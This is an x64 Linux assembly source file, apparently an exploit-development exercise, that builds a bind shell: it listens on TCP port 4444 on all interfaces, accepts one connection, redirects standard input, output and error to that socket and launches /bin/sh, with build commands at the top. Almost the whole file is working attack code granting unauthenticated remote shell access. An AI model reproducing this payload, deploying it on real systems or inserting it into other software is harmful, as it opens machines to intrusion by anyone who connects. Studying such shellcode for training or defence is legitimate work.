; Program to accept a TCP connection and provide a shell on x64 Linux
; Author: illustrissimus

; To build and run:
; nasm -f elf64 -o bs.o bs.asm
; ld -o bs bs.o; strip -s bs

; To inspect:
; objdump -M intel -d bs

default rel

global _start

section .text
_start:
; create socket
	mov	rax, 41 ; socket
	mov	rdi, 2 ; domain = AF_INET
	mov	rsi, 1 ; type = SOCK_STREAM
	mov	rdx, 0 ; protocol = INADDR_ANY
	syscall
	mov	rdi, rax ; store the socket FD in RDI
	
; bind the socket
	; prepare the sockaddr_in
	xor	rax, rax
	push	rax
	mov	dword [rsp-0x4], eax ; sin_addr = 0.0.0.0
	; import socket \n hex(socket.htons(4444))
	mov	word [rsp-0x6], 0x5c11 ; sin_port = 4444
	mov	word [rsp-0x8], 0x2 ; sin_family = AF_INET
	sub	rsp, 0x8
	; make the call
	mov	rax, 49 ; bind
	; RDI already contains the socket FD
	mov	rsi, rsp ; addr -> sockaddr_in
	mov	rdx, 0x10 ; addrlen = 16
	syscall

; listen on the socket
	mov	rax, 50 ; listen
	; RDI already contains the socket FD
	mov	rsi, 1 ; backlog = 1
	syscall

; accept the TCP connection
	mov	rax, 43 ; accept
	; RDI already contains the socket FD
	sub	rsp, 0x10 ; reserve 16B on the stack
	mov	rsi, rsp ; addr, populated when the client connects
	mov	byte [rsp-0x1], 0x10 ; addrlen = 16
	sub	rsp, 0x1
	mov	rdx, rsp
	syscall
	mov	r9, rax ; store the client socket FD in R9
	
; close the listening socket
	mov	rax, 3 ; close
	; RDI already contains the socket FD
	syscall
	mov	rdi, r9 ; RDI contains the client socket FD from now on

; duplicate file descriptors
	mov	rax, 33; dup2
	; RDI already contains the client socket FD
	mov	rsi, 0x0
	syscall
	mov	rax, 33; dup2
	mov	rsi, 0x1
	syscall
	mov	rax, 33; dup2
	mov	rsi, 0x2
	syscall

; execute /bin/sh
	mov	rax, 59 ; execve
	xor	rbx, rbx ; NULL terminator
	push	rbx
	mov	rbx, 0x68732f6e69622f2f ; "hs/nib//"
	push	rbx
	mov	rdi, rsp ; filename -> "//bin/sh\0"
	xor	rsi, rsi ; argv = NULL
	xor	rdx, rdx ; envp = NULL
	syscall
	
; exit the program
	mov	rax, 60 ; exit
	mov	rdi, 0 ; exit code
	syscall